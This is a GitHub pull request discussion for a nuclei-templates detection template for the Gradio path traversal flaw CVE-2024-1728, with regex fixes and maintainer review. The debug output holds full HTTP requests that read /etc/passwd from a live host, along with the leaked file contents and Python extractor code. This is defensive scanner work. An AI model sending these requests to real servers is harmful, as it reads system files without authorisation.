
Fixed CVE-2024-1728 False Negatives by Adjusting Regex Expressions #10518

Merged (3 commits) Oct 7, 2024

Conversation

ShaneIan
Contributor

@ShaneIan ShaneIan commented Aug 12, 2024

Template / PR Information

  • Fixed CVE-2024-1728.yaml: Resolved issues with false negatives caused by a greedy regex expression in the Nuclei template for detecting the Gradio path traversal vulnerability.
  • References:

Template Validation

I've validated this template locally?

  • YES
  • NO

Additional Details (leave it blank if not applicable)

  • Tested on both Windows and Linux environments: The template was tested on both environments to ensure it accurately detects the vulnerability without false negatives.
    • Caveat: On Windows, the Gradio server required additional logic to block Linux file paths. Without this adjustment, Linux file paths caused issues on the Windows server.
  • Regex Refinement: Adjusted the regex to avoid greedy matching, specifically focusing on the path traversal patterns used in Gradio.

Additional References:

The previous version of the template used a greedy regex expression (.*), which was causing false negatives during testing on both Windows and Linux systems.
@GeorginaReeder

Thanks so much for your contribution @ShaneIan, we appreciate it! :)

@princechaddha
Member

Hello, the response time for this PR was longer than usual because the team was traveling for DEFCON. Thank you for your contribution.

Could you please confirm why the POST data was updated to remove the extra array brackets? Can you also confirm if it still works without them? Additionally, if you could share the redacted debug data, that would be very helpful.

@princechaddha princechaddha added the good first issue Good for newcomers label Aug 26, 2024
@princechaddha princechaddha self-assigned this Aug 26, 2024
@ShaneIan
Contributor Author

Yes, of course.

For the duplicate bracket, I saw no reason for it to be there, as it was seemingly causing an error on my simulated client side. The client’s fileInput was expecting a dictionary, not a list, so formatting it as such was causing the fileInput to misunderstand. And yes, as of the last testing with the removed brackets, the template was able to produce positive results.

As for the debug data, this is my first contribution, so I am unsure exactly what you mean. However, I absolutely can help.

@princechaddha
Member

@ShaneIan, thank you for the confirmation. For the debug data, please run the template with the -debug flag and share the response, making sure to remove any host data if it’s public. This will help us validate the template easily.

@ShaneIan
Contributor Author

Nuclei Debug Output

I ran the template with debug information as requested:

nuclei -t CVE-2024-1728-debug.yaml -u https://8c4e50cf2fa07a02f3.gradio.live -debug

Output:

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.3.0

                projectdiscovery.io

[INF] Your current nuclei-templates v9.9.2 are outdated. Latest is v9.9.3
[INF] Successfully updated nuclei-templates (v9.9.3) to /home/username/nuclei-templates. GoodLuck!
[WRN] Setting thread count to 0 for 2 templates, dynamic extractors are not supported with payloads yet
[INF] Current nuclei version: v3.3.0 (outdated)
[INF] Current nuclei-templates version: v9.9.3 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 56
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [CVE-2024-1728] Dumped HTTP request for https://8c4e50cf2fa07a02f3.gradio.live/queue/join

POST /queue/join HTTP/1.1
Host: 8c4e50cf2fa07a02f3.gradio.live
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Connection: close
Content-Length: 246
Content-Type: application/json
Accept-Encoding: gzip

{"data":[{"path":"/etc/passwd","url":"https://8c4e50cf2fa07a02f3.gradio.live/file=/help","orig_name":"CHANGELOG.md","size":3549,"mime_type":"text/plain"}],"event_data":null,"fn_index":0,"trigger_id":2,"session_hash":"2lO2isOTC6iTjxeQH2PPsv2vBoF"}
[DBG] [CVE-2024-1728] Dumped HTTP response https://8c4e50cf2fa07a02f3.gradio.live/queue/join

HTTP/1.1 200 OK
Connection: close
Content-Length: 47
Content-Type: application/json
Date: Fri, 30 Aug 2024 16:55:32 GMT
Server: uvicorn

{"event_id":"8a0ceca55f544957bbba889309dd3f3b"}
[INF] [CVE-2024-1728] Dumped HTTP request for https://8c4e50cf2fa07a02f3.gradio.live/queue/data?session_hash=2lO2isOTC6iTjxeQH2PPsv2vBoF

GET /queue/data?session_hash=2lO2isOTC6iTjxeQH2PPsv2vBoF HTTP/1.1
Host: 8c4e50cf2fa07a02f3.gradio.live
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

[DBG] [CVE-2024-1728] Dumped HTTP response https://8c4e50cf2fa07a02f3.gradio.live/queue/data?session_hash=2lO2isOTC6iTjxeQH2PPsv2vBoF

HTTP/1.1 200 OK
Connection: close
Transfer-Encoding: chunked
Content-Type: text/event-stream; charset=utf-8
Date: Fri, 30 Aug 2024 16:55:33 GMT
Server: uvicorn

data: {"msg": "estimation", "event_id": "8a0ceca55f544957bbba889309dd3f3b", "rank": 0, "queue_size": 1, "rank_eta": null}

data: {"msg": "process_starts", "event_id": "8a0ceca55f544957bbba889309dd3f3b", "eta": null}

data: {"msg": "process_completed", "event_id": "8a0ceca55f544957bbba889309dd3f3b", "output": {"data": ["/tmp/gradio/uploads/passwd"], "is_generating": false, "duration": 0.0003364086151123047, "average_duration": 0.0003364086151123047}, "success": true}

[INF] [CVE-2024-1728] Dumped HTTP request for https://8c4e50cf2fa07a02f3.gradio.live/file=/tmp/gradio/uploads/passwd

GET /file=/tmp/gradio/uploads/passwd HTTP/1.1
Host: 8c4e50cf2fa07a02f3.gradio.live
User-Agent: Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

[DBG] [CVE-2024-1728] Dumped HTTP response https://8c4e50cf2fa07a02f3.gradio.live/file=/tmp/gradio/uploads/passwd

HTTP/1.1 200 OK
Connection: close
Content-Length: 1416
Accept-Ranges: bytes
Content-Type: text/plain; charset=utf-8
Date: Fri, 30 Aug 2024 16:55:33 GMT
Etag: "1e8d128acb45e2fb5860a2c19e940891"
Last-Modified: Mon, 18 Mar 2024 22:13:35 GMT
Server: uvicorn

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
tcpdump:x:107:113::/nonexistent:/usr/sbin/nologin

Findings:

[CVE-2024-1728:regex-1] [http] [high] https://8c4e50cf2fa07a02f3.gradio.live/file=/tmp/gradio/uploads/passwd [path="/etc/passwd"]
[CVE-2024-1728:status-2] [http] [high] https://8c4e50cf2fa07a02f3.gradio.live/file=/tmp/gradio/uploads/passwd [path="/etc/passwd"]
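The PR description attributes the false negatives to a greedy `.*` in the template, and the debug output above shows where that bites: the uploaded path has to be pulled out of the `process_completed` SSE event before the follow-up `/file=` request can be built. The following is an added illustration, not code from this PR or from nuclei-templates; the two extractor patterns (`GREEDY_PATH`, `STRICT_PATH`) are hypothetical stand-ins for the shape of regex the thread describes, and the SSE sample is copied from the response shown above with the event_id shortened.

```python
import json
import re
from typing import Optional

# Constructed sample: the SSE body from this thread's debug output (event_id shortened).
SSE_BODY = (
    'data: {"msg": "estimation", "event_id": "8a0ceca5", "rank": 0, "queue_size": 1, "rank_eta": null}\n'
    "\n"
    'data: {"msg": "process_starts", "event_id": "8a0ceca5", "eta": null}\n'
    "\n"
    'data: {"msg": "process_completed", "event_id": "8a0ceca5", "output": {"data": ["/tmp/gradio/uploads/passwd"], '
    '"is_generating": false, "duration": 0.0003364, "average_duration": 0.0003364}, "success": true}\n'
)

# Hypothetical greedy extractor: .* backtracks to the LAST double quote on the line, so the
# captured "path" drags the rest of the JSON object along with it and the next request 404s.
GREEDY_PATH = re.compile(r'"data": \["(.*)"')
# Tightened version: a negated character class cannot run past the closing quote.
STRICT_PATH = re.compile(r'"data": \["([^"]+)"\]')


def extract_path(body: str, pattern: re.Pattern) -> Optional[str]:
    """Return the first capture group of `pattern` over the raw SSE body, or None."""
    m = pattern.search(body)
    return m.group(1) if m else None


def extract_path_structured(body: str) -> Optional[str]:
    """Parse the stream instead of pattern-matching it: decode each `data:` event as JSON
    and return output.data[0] from the successful process_completed message."""
    for line in body.splitlines():
        if not line.startswith("data: "):
            continue
        event = json.loads(line[len("data: "):])
        if event.get("msg") == "process_completed" and event.get("success"):
            data = event.get("output", {}).get("data") or []
            return data[0] if data else None
    return None


# Matcher for the final /file= response: anchored to a line start so a stray "root:"
# substring inside an error message or echoed JSON does not count as a hit.
PASSWD_LINE = re.compile(r"^root:[^:]*:0:0:", re.MULTILINE)


def looks_like_passwd(body: str) -> bool:
    """True when the body contains a passwd-style root entry (uid 0, gid 0)."""
    return PASSWD_LINE.search(body) is not None
```

Run against the sample, the greedy pattern returns a string that starts with the right path but continues into `"is_generating": false, ...`, while the strict pattern and the JSON walk both return exactly `/tmp/gradio/uploads/passwd`.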

@princechaddha
Member

Hi @ShaneIan, thank you for sharing the additional data. The PR notification was somehow missed and remained open. Thank you once again for updating the template.

@princechaddha princechaddha merged commit 529ab72 into projectdiscovery:main Oct 7, 2024
3 checks passed
@princechaddha princechaddha added the Done Ready to merge label Oct 7, 2024
@princechaddha
Member

You can grab some cool PD stickers over here http://nux.gg/stickers 😄

@techcraver

Hey @ShaneIan thanks for the sticker request! I'll send some off when I have them in hand (I'm new to the PD team and they're on order. :) )
